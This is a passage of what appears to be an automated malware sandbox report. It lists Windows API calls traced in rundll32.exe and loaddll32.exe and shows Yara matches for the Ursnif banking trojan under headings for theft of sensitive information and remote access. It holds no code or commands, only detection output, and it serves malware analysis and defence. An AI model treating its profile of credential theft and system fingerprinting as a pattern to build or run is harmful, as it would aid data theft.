Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 4_2_6E22D10F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E22EE88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 4_2_6E22EEC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 4_2_6E22EF45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 4_2_6E22EFC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 4_2_6E222A26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 4_2_6E22F2E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 4_2_6E22CB0D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_6E22AB64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 4_2_6E22F394
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free, 4_2_6E21E036
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E2229A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 4_2_6E22F1BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F1ADA GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6E1F1ADA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02BAA199 wsprintfA,GetUserNameW,GetComputerNameW,GetUserNameW,GetComputerNameW,WideCharToMultiByte, 0_2_02BAA199
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1F1F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6E1F1F0E

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.375971100.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375934102.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375882980.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375768564.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375954554.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375906864.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375822644.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375857537.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6760, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.375971100.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375934102.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375882980.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375768564.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375954554.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375906864.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375822644.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.375857537.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6760, type: MEMORY